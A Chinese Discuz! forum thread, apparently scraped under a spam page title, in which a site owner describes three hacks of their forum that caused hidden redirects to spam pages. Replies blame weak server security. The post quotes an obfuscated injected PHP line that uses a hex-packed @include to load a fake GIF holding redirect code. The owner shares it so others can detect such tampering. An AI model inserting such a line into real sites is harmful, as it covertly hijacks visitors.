久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區(qū)

標(biāo)題: 記錄這一年來自己論壇被黑跳轉(zhuǎn)垃圾網(wǎng)頁的問題 [打印本頁]

作者: lookbear 時(shí)間: 2020-3-23 20:51
標(biāo)題: 記錄這一年來自己論壇被黑跳轉(zhuǎn)垃圾網(wǎng)頁的問題
DZ論壇現(xiàn)在已經(jīng)是高危的程序
這可能跟多年不更新有關(guān)系，從來沒有哪個(gè)時(shí)候像今年一樣反復(fù)被黑！
目前已經(jīng)開啟了 ESET殺毒軟件，希望不會(huì)了

在此寫下三次論壇網(wǎng)頁被修改的樣式，以備大家參考！

這三次被黑，表現(xiàn)都是訪問網(wǎng)頁會(huì)跳轉(zhuǎn)到垃圾頁面，但是都很隱蔽，有的會(huì)偶爾彈出，有的會(huì)選擇只在手機(jī)端彈出等等！

1. config/config_global.php 被篡改
在 config_global.php 文件底部會(huì)出現(xiàn)一些超長(zhǎng)的不正常代碼，對(duì)比一下正版文件就可以發(fā)現(xiàn)異常

2..htaccess 文件被篡改，因?yàn)橐呀?jīng)被刪除，記不得添加了哪兩句，自行對(duì)比下

3.前幾天的發(fā)生的， INDEX.PHP 被篡改。

@include(PACK('H*','2e2f7374617469632f696d6167652f636f6d6d6f6e2f6e6f696d672e676966'));

復(fù)制代碼

經(jīng)過查詢，是執(zhí)行一個(gè)

@include(PACK('H*','./static/image/common/noimg.gif'));

復(fù)制代碼

經(jīng)過查詢，noimg.gif根本不是圖片，里邊存有跳轉(zhuǎn)代碼。

多事之秋，各種病毒泛濫，對(duì)于DZ這個(gè)老程序真是千瘡百孔，把這些分享給大家。因?yàn)榫退隳銡⒘硕?，不找出被篡改的文件，也是枉然?br />

作者: 羅永浩 時(shí)間: 2020-3-24 02:14
想轉(zhuǎn)WP了，昨晚看了一晚上的主題先收藏起來，到時(shí)候移過來

作者: guessxiaohuang 時(shí)間: 2020-3-24 21:53
好像也沒錯(cuò)哦，HTML5在國外已經(jīng)被大量網(wǎng)站使用了，看了下discuz內(nèi)部代碼，居然沒有跟進(jìn)，的確慢慢的就落后了

作者: lemon 時(shí)間: 2020-3-24 22:29
牛逼網(wǎng)站時(shí)常被人掂記，我的網(wǎng)站5 6年都沒人來黑。

作者: Killer 時(shí)間: 2020-3-24 23:13
文件被修改基本都是服務(wù)器本身安全沒做好，而非DZ被黑，加強(qiáng)服務(wù)器安全防止被入侵是關(guān)鍵，不然任何程序都會(huì)被黑的

作者: 鴻茂傳媒 時(shí)間: 2020-3-25 11:10
服務(wù)器沒有做好安全。

作者: guessxiaohuang 時(shí)間: 2020-3-25 16:43

Killer 發(fā)表于 2020-3-24 23:13
文件被修改基本都是服務(wù)器本身安全沒做好，而非DZ被黑，加強(qiáng)服務(wù)器安全防止被入侵是關(guān)鍵，不然任何程序都會(huì) ...

我贊同你的說法，discuz安全性我也測(cè)試過，99%的攻擊方法都沒什么用，他的這個(gè)應(yīng)該是FTP密碼被別人知道了，然后被上傳木馬文件，他不徹底清除惡意代碼的話，就只能重裝了

作者: dss 時(shí)間: 2020-3-25 18:16
樓主用哪里的服務(wù)器建站？

作者: ill01 時(shí)間: 2020-4-25 17:49
提示: 作者被禁止或刪除內(nèi)容自動(dòng)屏蔽

作者: simonzhd 時(shí)間: 2020-4-26 11:10
說的我怕怕的

歡迎光臨 Discuz! 官方交流社區(qū) (http://www.9999xn.com/)